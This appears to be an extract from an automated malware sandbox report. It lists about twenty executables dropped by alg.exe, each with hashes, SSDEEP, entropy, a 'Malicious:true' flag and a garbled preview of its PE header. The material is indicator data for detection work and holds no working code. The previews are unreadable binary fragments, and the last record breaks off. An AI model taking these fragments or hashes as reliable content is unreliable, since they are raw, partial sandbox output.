                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@.................................k............ ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc...p...p...`...F..............@...................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1343488
                                                                                                                                                                                                    Entropy (8bit):5.23604073090413
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:ZjuozQMGNUbTKXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:BfesqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:8568C2E806F0DAF6D7605890C6169645
                                                                                                                                                                                                    SHA1:1FBD8DD4F014D5F3C6C9E54614EEEB2FB9F4B88C
                                                                                                                                                                                                    SHA-256:9381A43C09DB4CCBC731EA9FF99EA9751F869C42BA68DEBA70DB3E70BD9B508D
                                                                                                                                                                                                    SHA-512:1678F33233239B8347ED36B2811A5A1B75201A3F3832EC3E78560EE604D40B35FD7EF4BB7B3349BFAAD69220C027682C7CA30903DCD371E1D95D3DDF989395FE
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .(.d.F.d.F.d.F.m..l.F...B.h.F...E.`.F...C.{.F...G.c.F.d.G...F...N.M.F.....f.F.....e.F...D.e.F.Richd.F.................PE..d....~0/.........."..........P.................@.......................................... .......... ...................................... ........ ..(...............................T....................e..(...`d..8............e...............................text............................... ..`.rdata..............................@..@.data...@...........................@....pdata..............................@..@.rsrc...(.... ......................@..@.reloc...p...0...`... ..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1496064
                                                                                                                                                                                                    Entropy (8bit):5.577928285585659
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:ebUO42i/ELsqjnhMgeiCl7G0nehbGZpbD:eJ/Dmg27RnWGj
                                                                                                                                                                                                    MD5:7F8D5C084AF305C5A1528E1E58B82619
                                                                                                                                                                                                    SHA1:BED1107A6C571AD5B0A703111152D5B104174F36
                                                                                                                                                                                                    SHA-256:E900AC454B23BDF1C1B0BBE29507145A2D225EDACD4FE3AC83200489D447219F
                                                                                                                                                                                                    SHA-512:C336E63615B842EE38F2C9868EF7A3BCC0966973EFAB551A0E4CF9FDC0BE5D871202F332DEBC3DBD1563FDD8D65E2394CE5734B47EAA387560135CC9E63FF56A
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X..i.v.:.v.:.v.:...;9v.:...;.v.:...;.v.:.v.:.v.:...;$v.:...;4v.:...:.v.:...;.v.:Rich.v.:........................PE..L......m.................0...|...............@....@.......................... ......|............ ......................................................................T...................`[..........@............p...............................text...l/.......0.................. ..`.data...@'...@.......4..............@....idata..@....p.......L..............@..@.c2r.................\...................rsrc................^..............@..@.reloc...........p...d..............@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):52712960
                                                                                                                                                                                                    Entropy (8bit):7.961838779845351
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1572864:5LjL44lyBc+UN0qRsMjDAY9d5o/paLXzHLe:5icZmsR3Lo/cnLe
                                                                                                                                                                                                    MD5:282E75847F51D196CC51C7BB8380441E
                                                                                                                                                                                                    SHA1:92BB92159B9D882397E545AB3F17C9D4BDC4A248
                                                                                                                                                                                                    SHA-256:2BB106924401045E2B7D303C8B9C32A1F157E825FD64B8D817F7D8BEBD898D1F
                                                                                                                                                                                                    SHA-512:1112AED8E7674EFF1866682C0A5EC7000ACCF5398DA6512B7813D1848B3E75BD8A4F24079D6E1F27FB050B3836FB0F96B28C05E147FB2BBD809F5B1C5DC8218C
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......LN.../nB./nB./nB.]mC./nB.]kC./nB.TjC./nB.TmC./nB.TkC}/nB.FjC./nB.FkC3/nB.]hC./nB.]jC./nB.]oC?/nB./oBq-nB.TgC./nB.TkC./nB.TnC./nB.T.B./nB.TlC./nBRich./nB........................PE..L...1~............"....!.j(.........p]........(...@...........................$.....M#%..............................l3..t....3.0.....6.X............................./.p...................../.....h./.@.............(......j3.`....................text...jh(......j(................. ..`.rdata........(......n(.............@..@.data...t.... 4.......4.............@....didat..$.....5.......5.............@....rsrc...X.....6.......5.............@..@.reloc... ...........F..............@...................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4993536
                                                                                                                                                                                                    Entropy (8bit):6.811110838648933
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:98304:AlkkCqyDEY7+o3OBvfGVY+40ya8yS+9s/pLaD527BWG:KkkCqaE68eV+0ynE6LaVQBWG
                                                                                                                                                                                                    MD5:94E6E8EA4563BE60FFA814FC88563EAB
                                                                                                                                                                                                    SHA1:69D27D4E23857E7EA0842434AD907E73F0E5CE7F
                                                                                                                                                                                                    SHA-256:C97DBD43920E272F7A2F4C8029D969B8FEFF571C592ADB57F56121C84BB44872
                                                                                                                                                                                                    SHA-512:6B5C22016D626E24CAA79482C6A6DBD393EF90B2D84E4150DC3701FE04CC9C10AF92947012254294F755CA7B2E9014B27654864DCF2AF39264F773DAF32B82EE
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........:V@.[8..[8..[8.{);..[8.{)=..[8..!<..[8..!;..[8..!=..[8.\.U..[8.\.E..[8.{)<..[8.{)>..[8.{)9..[8..[9..X8..!=..[8..!1.0^8..!...[8..[...[8..!:..[8.Rich.[8.................PE..L......e..........".... ..*..Z........%......`+...@..........................pL......L......................................=......p?.............................<.=.8...................P.:..... .+.@.............+......j=......................text.....*.......*................. ..`.rdata........+.......*.............@..@.data.........=.......=.............@....rsrc........p?......F?.............@..@.reloc........?......R?.............@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1657344
                                                                                                                                                                                                    Entropy (8bit):5.63513140211088
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:4E8DMeflpnIOvYUssqjnhMgeiCl7G0nehbGZpbD:4tDD9pnIO6Dmg27RnWGj
                                                                                                                                                                                                    MD5:7AB9293B5DF0CE748D4B82DFABF59C08
                                                                                                                                                                                                    SHA1:4DD99DD6EBBB4416B58183FD8A306E1E51B4C409
                                                                                                                                                                                                    SHA-256:FBE871DFFE4405C0F63AAB8E015213D05691BDE0446C7970BCA56B6F7E434FF3
                                                                                                                                                                                                    SHA-512:81767B99858108DD1F4C2980DFFC45BEA98F3BA36391338DC2124B9C3479C909346A09F50135E6C4013BC34A42E06470071DD93E7A60E8C18313008C7216F8BF
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........J......@!.........@.....................................8.... .............................................................X........F......................T.......................(...P...@...........@...`............................text............................... ..`.rdata..8...........................@..@.data...XL....... ...d..............@....pdata...F.......H..................@..@.00cfg..8.... ......................@..@.gxfg....*...0...,..................@..@.retplne.....`...........................tls.........p......................@..._RDATA..\...........................@..@.rsrc...X...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4364800
                                                                                                                                                                                                    Entropy (8bit):6.748481749203124
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:49152:VB1sstqMHiq8kBfK9a+cOVE/TqEpEepIkRqqUu9wg6KFYso8l8EFDmg27RnWGj:hHzorVmr2ZkRpdJYolTD527BWG
                                                                                                                                                                                                    MD5:42C6C4837223672FF4BB89256F00C50E
                                                                                                                                                                                                    SHA1:A636FEE88E1A8E2A458478CFD9D345B2B0DF022C
                                                                                                                                                                                                    SHA-256:C1C50F36BD18DCE8967D9575438B3AF610BADD62B497D459A0BECA901C0FF3AC
                                                                                                                                                                                                    SHA-512:2E6C6267D4A0C24CA50E3D86625FF5E85BA6BBC99F3C5EBA71039AF342D574A5BA7CC12EFD3CD2087AFF1216FF4C09CA07C781749A6E79EA48E28392D5B91B13
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......'..".......K.........@.............................PD.....W.B... .....................................................P.... 4.......2..Q..................to..8...................`j..(.....'.@...........0.......`........................text...'.'.......'................. ..`.rdata...A....'..B....'.............@..@.data........./......./.............@....pdata...Q....2..R....0.............@..@.00cfg..0....p3......42.............@..@.gxfg....2....3..4...62.............@..@.retplne......3......j2..................tls..........3......l2.............@...LZMADEC.......3......p2............. ..`_RDATA..\.....4.......2.............@..@malloc_h......4.......2............. ..`.rsrc........ 4.......2.............@..@.reloc... ...0;.......9.............@...................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1238528
                                                                                                                                                                                                    Entropy (8bit):5.146945575618437
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:03w1uVdSEjmXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:0EyTmsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:A648965C63685811B43522A853291025
                                                                                                                                                                                                    SHA1:B79032C5D68481320433972D0067BA1EED164021
                                                                                                                                                                                                    SHA-256:2FED2141223149432FE2058C0F827B5F86381C92AA75F94C7477335D7D054336
                                                                                                                                                                                                    SHA-512:FDFF9D54E62A7A8EB5F498A437D15330FED74F6A7A642806B3C97A9DAAC0951F1286EB5A2EEF3A9EBAFEBA5653AA707FAA8E5151C22F6AE3CF6D58E0A2A6D158
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."............................@.............................P............ ..................................................]..(....................................W..T...............................@............`..X............................text............................... ..`.rdata..,...........................@..@.data...0............j..............@....pdata...............v..............@..@.00cfg..8...........................@..@.gxfg...P...........................@..@.retplne................................_RDATA..\...........................@..@.rsrc...............................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2354176
                                                                                                                                                                                                    Entropy (8bit):7.049983699688517
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:49152:9hDdVrQ95RW0YEHyWQXE/09Val0GTDmg27RnWGj:9hHYW+HyWKQD527BWG
                                                                                                                                                                                                    MD5:F691545D151C73AC2F1C8FC3F6553944
                                                                                                                                                                                                    SHA1:3EB8AC057117979951B297233DF24826DD009665
                                                                                                                                                                                                    SHA-256:03EF07AE57C997D5BB045FBFFD9486C362D6237BA28F0A122C0DD40DB1E350D3
                                                                                                                                                                                                    SHA-512:F638F1E896FBA52D6162B134EC50F7C582295885257CF7A4280F50623D07EB294EF750F9FADD7E11ACD75C11779091C9A65E9C9E0A4741DCE050CE0DFE7834A5
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......2...........b.........@.............................`%......$... .........................................p%......>).......@..................................8.......................(....c..@........... 0..P............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data...4...........................@....pdata..............................@..@.00cfg..0...........................@..@.gxfg............0..................@..@.retplne.................................tls....!...........................@..._RDATA..\.... ......................@..@malloc_h.....0...................... ..`.rsrc........@......................@..@.reloc.......`......................@...........................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1825280
                                                                                                                                                                                                    Entropy (8bit):7.158493551466153
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:b70E0ZCQZMiU6Rrt9RoctGfmddBsqjnhMgeiCl7G0nehbGZpbD:H0EzQSyRPRoc1pDmg27RnWGj
                                                                                                                                                                                                    MD5:A2CA7F4768212109C8048F734D1E2D7A
                                                                                                                                                                                                    SHA1:93BAB3E5655735790F3E63FD4004FD2D2A4C2CD0
                                                                                                                                                                                                    SHA-256:D363CDA253B467BEB53442A3192E36DF33BAFF74430D98FA6E8D44D040DA426F
                                                                                                                                                                                                    SHA-512:A9A64122A763D129F084E3338AEB896B0A02B57C971FEBCB1C12D39980BDD80E71E7C15AD546D77FAF93946CC2D6AE0E49F1F96E7CA7824B20CE5C449B6BAAC6
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........v.......k.........@.............................0............ ..........................................u......ly....... ..........,....................d..T...................hc..(.......@...........@... ............................text............................... ..`.rdata.............................@..@.data........@......."..............@....pdata..,...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc........ ......................@..@.reloc.......0......................@...........................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1847808
                                                                                                                                                                                                    Entropy (8bit):7.14548043248358
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:AiD2VmA1YXwHwlklb8boUuWPg2gSsqjnhMgeiCl7G0nehbGZpbD:zD2VmAyiwIb8boQlDmg27RnWGj
                                                                                                                                                                                                    MD5:2195B2F51FB971E401131E845D3D794F
                                                                                                                                                                                                    SHA1:41A95B5E06FE564DF846569604487F940D047987
                                                                                                                                                                                                    SHA-256:62B4ACBC5FEDF4751D5C689D50F3BB9A4F52F2D26BF601761301343619F5C49D
                                                                                                                                                                                                    SHA-512:D76CCF1887C94439CCDA9AF830409DE434C98CC20715EF0F054833FBAFFD6654C9AB2FF2A917B52D973EC622B1C2B9506E8A824CF0E7B44C6DF7CFC85C1A5E2E
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p............ .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2853376
                                                                                                                                                                                                    Entropy (8bit):6.950744770081253
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:49152:CfD3zO9ZhBGloizM3HRNr00dDmg27RnWGj:4DaalxzM00dD527BWG
                                                                                                                                                                                                    MD5:EE66E250FFA30D92568FA3119CD00A42
                                                                                                                                                                                                    SHA1:86B96189EEEC516F99553F1536E8D6EECE1445DF
                                                                                                                                                                                                    SHA-256:AF3D5FE011E5B6ACBBA2FB2BE542AA7129D986C059F9E31EE1F4E439A0C73A36
                                                                                                                                                                                                    SHA-512:DBE07D0F6EDD28891205F6CC283F8F0BA068AB1152843460C43ED7B24AFE93E438DE2995194ABCED93806FD07260BEDD99892A43BF7C4622975DA7E9837D07C1
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......l...2......@..........@..............................-......F,... .................................................h.........!.. ...P ........................8......................(...P...@...............x............................text....k.......l.................. ..`.rdata...............p..............@..@.data...T....p.......^..............@....pdata.......P ......d..............@..@.00cfg..0.... !......* .............@..@.gxfg...P1...0!..2..., .............@..@.retplne.....p!......^ ..................tls..........!......` .............@...LZMADEC.......!......b ............. ..`_RDATA..\.....!......t .............@..@malloc_h......!......v ............. ..`.rsrc.... ....!.."...x .............@..@.reloc........$.......".............@...................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4320256
                                                                                                                                                                                                    Entropy (8bit):6.824607789794217
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:49152:9TaRe7mkn5KLvD5qGVC0080pb4tgLUgGEsLABD5wTQh07yrLMLl9YPhCDmg27RnN:0I72LvkrDpbxJRoIMVD527BWG
                                                                                                                                                                                                    MD5:BAEB391C792EF29C69C2674A24C724BA
                                                                                                                                                                                                    SHA1:C315E5FCE7DADB92E44FC221688AF41BF221E152
                                                                                                                                                                                                    SHA-256:716DCB938DE64EC2E664EE8C42EB7E62307A6F9D10ACFDC23575C9583CABF4ED
                                                                                                                                                                                                    SHA-512:5C5629F8AA436C864FB50D0CAE5FB4A4F089A2A560BF0EC545BE722046A0B38A7ABD1BF2BFDFB11EEBA6A41851E0755D9496DFEBE8D8B1E49253CEE3EA23D8CD
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......,......... k.........@..............................C......B... ..........................................'3......+3.P.....8.x....P6..e..................h.2.T.....................2.(...P"-.@............43.......3. ....................text...E.,.......,................. ..`.rdata..4#....-..$....,.............@..@.data........@4.......4.............@....pdata...e...P6..f...45.............@..@.00cfg..0.....7.......6.............@..@.gxfg...@4....7..6....6.............@..@.retplne......8.......6..................tls....-.... 8.......6.............@...CPADinfo8....08.......6.............@...LZMADEC......@8.......6............. ..`_RDATA..\....`8.......6.............@..@malloc_h.....p8.......6............. ..`.rsrc...x.....8.......6.............@..@.reloc... ...p:.......8.............@...........................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2062336
                                                                                                                                                                                                    Entropy (8bit):7.097244697628849
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:oW9Jml9mmijviMnF+ZxmQWcbLw8VxsqjnhMgeiCl7G0nehbGZpbD:oWnm5iOMkjmQWkVFDmg27RnWGj
                                                                                                                                                                                                    MD5:DE1CBA1E46123C97F5943E324B00518C
                                                                                                                                                                                                    SHA1:FFB7808E7519ABEEB6DDC7D5D1F24DE683957B98
                                                                                                                                                                                                    SHA-256:164B012FE12094517537B0D42135E774A4252ED181FF3D57CBC432ED52F3CF2E
                                                                                                                                                                                                    SHA-512:0202C4904317C36D3491F88EA9FFC17A92676D4D84E674F827CF2F481E018F57C24D1A43FE2EEC770EEB03350BA03A7B3DC621C8B271C03DDBDAAD2E9481DDA7
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......h...4......P..........@.............................. ......8 ... .................................................Z...................H......................8.......................(...`...@...........(...@............................text....g.......h.................. ..`.rdata...).......*...l..............@..@.data...............................@....pdata..H...........................@..@.00cfg..0....P.......H..............@..@.gxfg...p-...`.......J..............@..@.retplne.............x...................tls.................z..............@...CPADinfo8............|..............@..._RDATA..\............~..............@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1801216
                                                                                                                                                                                                    Entropy (8bit):7.166351995532331
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:0wNHwoYhua6MtjRO4qbBJTY6mY1uIgHsqjnhMgeiCl7G0nehbGZpbD:0wNPdQO7BJTfmEgDmg27RnWGj
                                                                                                                                                                                                    MD5:7D30E654C9C35674CAE2833F744B972C
                                                                                                                                                                                                    SHA1:A394E04F38D91D2743597A7F8EA07F4EA10F7A20
                                                                                                                                                                                                    SHA-256:8AFC16C0303E215962A205083FD8F6A096FC51C76F0D93F04BAEBA8F32AAE7BD
                                                                                                                                                                                                    SHA-512:A7E8E5B75F6A784F5CB8C8B3DA9174E4A2CF051E04510C4650779E4A522B6A89EC8902FB9CC05239AA72307FEB3445DC29B3164C9DC5B43E30AD73A111EB0C4B
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@.......................................... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1847808
                                                                                                                                                                                                    Entropy (8bit):7.145489742832482
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:6iD2VmA1YXwHwlklb8boUuWPg2gSsqjnhMgeiCl7G0nehbGZpbD:pD2VmAyiwIb8boQlDmg27RnWGj
                                                                                                                                                                                                    MD5:AFB207CF851D9ADF74DEF18A0F668DC5
                                                                                                                                                                                                    SHA1:110022500FC0D91296D8B0C9A15601B4D14B401D
                                                                                                                                                                                                    SHA-256:7E88D2A1B4413B141189CF2F38BF6A9F1967DB56D15DB21406F826A82A4DF74F
                                                                                                                                                                                                    SHA-512:055A94DAD5D7912139269116BEACFD8B64AA3A61539E0BC053DBF7D1F7FD8503B07AB79F060BE7ECA0F122E26CAEE0EB72AC6440D1F1D474A3C4DDA9AB083D90
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p............ .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1801216
                                                                                                                                                                                                    Entropy (8bit):7.166364178231097
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:RwNHwoYhua6MtjRO4qbBJTY6mY1uIgHsqjnhMgeiCl7G0nehbGZpbD:RwNPdQO7BJTfmEgDmg27RnWGj
                                                                                                                                                                                                    MD5:92A31A1AA9C6E8701A63D717668F7426
                                                                                                                                                                                                    SHA1:4588816504506D6A5E504E3899F9CFE6C6D82410
                                                                                                                                                                                                    SHA-256:5F2111A572DBB8378D4F52914149BB0D0490618D060503FAB33D2C45B8E5183F
                                                                                                                                                                                                    SHA-512:C903B62C6A7675619E5E26B92B77F82A287C77EA629EBC2CBE4D2AC0FF1974F2D27CD90D42729FFE8831C2EF91E8D767D8145ED96D360FD5DEC2E91FB4075E9F
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@......................................... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1325568
                                                                                                                                                                                                    Entropy (8bit):5.141853111232347
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:e4lbht6BHwsqjnhMgeiCl7G0nehbGZpbD:flNtqHsDmg27RnWGj
                                                                                                                                                                                                    MD5:9DC2FF769B58C0D1A4734FBD739F4626
                                                                                                                                                                                                    SHA1:385E83595DC49711DEA355328364028DAD836679
                                                                                                                                                                                                    SHA-256:4D370478F02E44FC5EB6F001008501D47B521A37EAB3BB1E1818327A9C7A9DA4
                                                                                                                                                                                                    SHA-512:87B93846E6747D8F6C04964BA8927AC754AFB440B1C0E82D1EBE59C3E06C1E155C74C671A17931496DCD4C62CB29A812C31C737DCE5354D26CB601313BD742D9
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o.y.+c..+c..+c..?...!c..?....c..?...9c..I...:c..I...8c..I....c..?...*c..?....c..+c..Xc......)c.....*c..+c..|c......*c..Rich+c..........................PE..L...B(.d.................^..........@........p....@.................................#.......................................H...<........q..........................pu..p...........................X...@...............@....k..`....................text...`\.......^.................. ..`.data........p.......b..............@....idata...............l..............@..@.didat...............v..............@....rsrc....q.......r...x..............@..@.reloc...`...0...P..................@...........................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1221120
                                                                                                                                                                                                    Entropy (8bit):5.138860525917477
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:FIkOkTB+wEXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:FIxkTBVEsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                    MD5:94FF84D754D03C3D860F8177AE55A8ED
                                                                                                                                                                                                    SHA1:1638291E81C10339881EFEA47CC51BC19CEF949C
